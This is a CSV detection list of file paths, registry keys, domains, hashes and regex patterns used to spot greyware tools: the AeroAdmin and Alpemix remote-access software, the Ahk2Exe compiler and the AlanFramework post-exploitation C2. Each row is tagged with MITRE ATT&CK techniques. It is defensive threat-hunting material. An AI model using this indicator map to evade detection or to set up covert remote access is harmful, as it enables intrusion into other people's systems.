"*\aeroadmin.exe*",".{0,1000}\\aeroadmin\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Aeroadmin.lnk*",".{0,1000}\\Aeroadmin\.lnk.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Aeroadmin\black.bmp*",".{0,1000}\\Aeroadmin\\black\.bmp.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Control\SafeBoot\Network\AeroadminService*",".{0,1000}\\CurrentControlSet\\Control\\SafeBoot\\Network\\AeroadminService.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Services\AeroadminService*",".{0,1000}\\CurrentControlSet\\Services\\AeroadminService.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\InventoryApplicationFile\aeroadmin*",".{0,1000}\\InventoryApplicationFile\\aeroadmin.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ProgramData\Aeroadmin\*",".{0,1000}\\ProgramData\\Aeroadmin\\.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","C:\ProgramData\Aeroadmin\log.json","10","10","N/A","N/A","N/A","N/A"
"*2ef8a13faa44755fab1ac6fb3665cc78f7e7b451*",".{0,1000}2ef8a13faa44755fab1ac6fb3665cc78f7e7b451.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Aeroadmin LLC*",".{0,1000}Aeroadmin\sLLC.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A"
"*AeroAdmin PRO - remote desktop.exe*",".{0,1000}AeroAdmin\sPRO\s\-\sremote\sdesktop\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AeroAdmin PRO.exe*",".{0,1000}AeroAdmin\sPRO\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AeroAdmin v4.* (*",".{0,1000}AeroAdmin\sv4\..{0,1000}\s\(.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AeroAdmin.cpp*",".{0,1000}AeroAdmin\.cpp.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AEROADMIN.EXE-*.pf*",".{0,1000}AEROADMIN\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Aeroadmin\Screenshots*",".{0,1000}Aeroadmin\\Screenshots.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AeroAdmin_2.exe*",".{0,1000}AeroAdmin_2\.exe.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*AeroadminService*",".{0,1000}AeroadminService.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","Service Name","10","10","N/A","N/A","N/A","N/A"
"*auth*.aeroadmin.com*",".{0,1000}auth.{0,1000}\.aeroadmin\.com.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*auth11.aeroadmin.com*",".{0,1000}auth11\.aeroadmin\.com.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*DEFAULT\Software\AeroAdmin*",".{0,1000}DEFAULT\\Software\\AeroAdmin.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*EE54577067550559C4711C9E5E10435807F9DEEE9A5ADB4409CB60A6B0108700*",".{0,1000}EE54577067550559C4711C9E5E10435807F9DEEE9A5ADB4409CB60A6B0108700.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*ulm.aeroadmin.com/*",".{0,1000}ulm\.aeroadmin\.com\/.{0,1000}","greyware_tool_keyword","aeroadmin","RMM software - full remote control / file transfer","T1021.001 - T1048.003","TA0008 - TA0011 - TA0009 - TA0010","N/A","N/A","RMM","https://ulm.aeroadmin.com/AeroAdmin.exe","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* Ahk2Exe.exe*",".{0,1000}\sAhk2Exe\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*/Ahk2Exe.exe*",".{0,1000}\/Ahk2Exe\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*/Ahk2Exe.git*",".{0,1000}\/Ahk2Exe\.git.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*/Ahk2Exe.zip*",".{0,1000}\/Ahk2Exe\.zip.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*/Ahk2Exe1.*.zip*",".{0,1000}\/Ahk2Exe1\..{0,1000}\.zip.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*/ahk-install.exe*",".{0,1000}\/ahk\-install\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*/ahk-v2.exe*",".{0,1000}\/ahk\-v2\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*/AutoHotkey_1*_setup.exe*",".{0,1000}\/AutoHotkey_1.{0,1000}_setup\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*/AutoHotkey_2*_setup.exe*",".{0,1000}\/AutoHotkey_2.{0,1000}_setup\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*/AutoHotkey64.exe*",".{0,1000}\/AutoHotkey64\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*/releases/download/Ahk2Exe*",".{0,1000}\/releases\/download\/Ahk2Exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\Ahk2Exe.ahk*",".{0,1000}\\Ahk2Exe\.ahk.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\Ahk2Exe.exe*",".{0,1000}\\Ahk2Exe\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\Ahk2Exe.zip*",".{0,1000}\\Ahk2Exe\.zip.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\AutoHotkey_1*_setup.exe*",".{0,1000}\\AutoHotkey_1.{0,1000}_setup\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\AutoHotkey_2*_setup.exe*",".{0,1000}\\AutoHotkey_2.{0,1000}_setup\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\AutoHotkey64.exe*",".{0,1000}\\AutoHotkey64\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\AutoHotkey64_UIA.exe*",".{0,1000}\\AutoHotkey64_UIA\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\AutoHotkeySC.bin*",".{0,1000}\\AutoHotkeySC\.bin.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\AutoHotkeyU32.exe*",".{0,1000}\\AutoHotkeyU32\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\AutoHotkeyUX.exe*",".{0,1000}\\AutoHotkeyUX\.exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\Program Files\AutoHotkey*",".{0,1000}\\Program\sFiles\\AutoHotkey.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\SetExeSubsystem.ahk*",".{0,1000}\\SetExeSubsystem\.ahk.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\SOFTWARE\Classes\.ahk\*",".{0,1000}\\SOFTWARE\\Classes\\\.ahk\\.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\SOFTWARE\Classes\AutoHotkeyScript\*",".{0,1000}\\SOFTWARE\\Classes\\AutoHotkeyScript\\.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*\UX\reset-assoc.ahk*",".{0,1000}\\UX\\reset\-assoc\.ahk.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*>AutoHotkey installer<*",".{0,1000}\>AutoHotkey\sinstaller\<.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*>AutoHotkey Setup<*",".{0,1000}\>AutoHotkey\sSetup\<.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*14a8b1ff0297c5f7c06c6ab36a257140c2f3d33e8c15a28e790d5039a29c00a7*",".{0,1000}14a8b1ff0297c5f7c06c6ab36a257140c2f3d33e8c15a28e790d5039a29c00a7.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*41092e2433211a876f2b14f16a29fdae85a0d7e74565b23ab9e9c85bee892351*",".{0,1000}41092e2433211a876f2b14f16a29fdae85a0d7e74565b23ab9e9c85bee892351.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*46d335c6ebda027aea00f5a8261b4d1a1763e17b858fe512bbe541f9bb66d464*",".{0,1000}46d335c6ebda027aea00f5a8261b4d1a1763e17b858fe512bbe541f9bb66d464.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*4e1e3123dd85d3ac65a0803b08dd89b9b12b5a00b9f566782855332d03e5fe26*",".{0,1000}4e1e3123dd85d3ac65a0803b08dd89b9b12b5a00b9f566782855332d03e5fe26.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*4f30ed7899506d15974d12e428f4647660f97a52cc21da06a6a295a06197bbd8*",".{0,1000}4f30ed7899506d15974d12e428f4647660f97a52cc21da06a6a295a06197bbd8.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*7a2aeb7256c40efa434c6fc95f920ee9b4555e526f2f7cd325b6dc482faa7c20*",".{0,1000}7a2aeb7256c40efa434c6fc95f920ee9b4555e526f2f7cd325b6dc482faa7c20.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*80840379e83b70528c541218023961323ae10cfd85b4a1dcf6bf0fc01a9336b7*",".{0,1000}80840379e83b70528c541218023961323ae10cfd85b4a1dcf6bf0fc01a9336b7.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*80ce06d9341317b4c4b4b1e89b2f046e0426e1e952eaa9152231cc26a08de58f*",".{0,1000}80ce06d9341317b4c4b4b1e89b2f046e0426e1e952eaa9152231cc26a08de58f.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*9f2c7f990c554ba286616dd08e59ac32d543e80eef335f5c65762c020234bc1b*",".{0,1000}9f2c7f990c554ba286616dd08e59ac32d543e80eef335f5c65762c020234bc1b.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*ab464ef9bfa3735111e4fbf0e21f34feecf29a66d8effce37814df6be1d8314b*",".{0,1000}ab464ef9bfa3735111e4fbf0e21f34feecf29a66d8effce37814df6be1d8314b.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","#filehash","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*AutoHotkey/Ahk2Exe*",".{0,1000}AutoHotkey\/Ahk2Exe.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*https://www.autohotkey.com/download/*",".{0,1000}https\:\/\/www\.autohotkey\.com\/download\/.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","1","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*s\AutoHotkey Window Spy.lnk*",".{0,1000}s\\AutoHotkey\sWindow\sSpy\.lnk.{0,1000}","greyware_tool_keyword","Ahk2Exe","Official AutoHotkey script compiler - misused in scripting malicious executables","T1059 - T1204 - T1036 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/Ahk2Exe","1","0","N/A","N/A","7","6","593","112","2024-08-10T23:15:47Z","2011-08-01T10:28:19Z"
"*http*://127.0.0.1:8081*",".{0,1000}http.{0,1000}\:\/\/127\.0\.0\.1\:8081.{0,1000}","greyware_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","459","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z"
"*http*://localhost:8081*",".{0,1000}http.{0,1000}\:\/\/localhost\:8081.{0,1000}","greyware_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","459","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z"
"*/Alpemix.zip*",".{0,1000}\/Alpemix\.zip.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Apemix.exe*",".{0,1000}\/Apemix\.exe.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Alpemix.ini*",".{0,1000}\\Alpemix\.ini.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Alpemix.zip*",".{0,1000}\\Alpemix\.zip.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Apemix.exe*",".{0,1000}\\Apemix\.exe.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
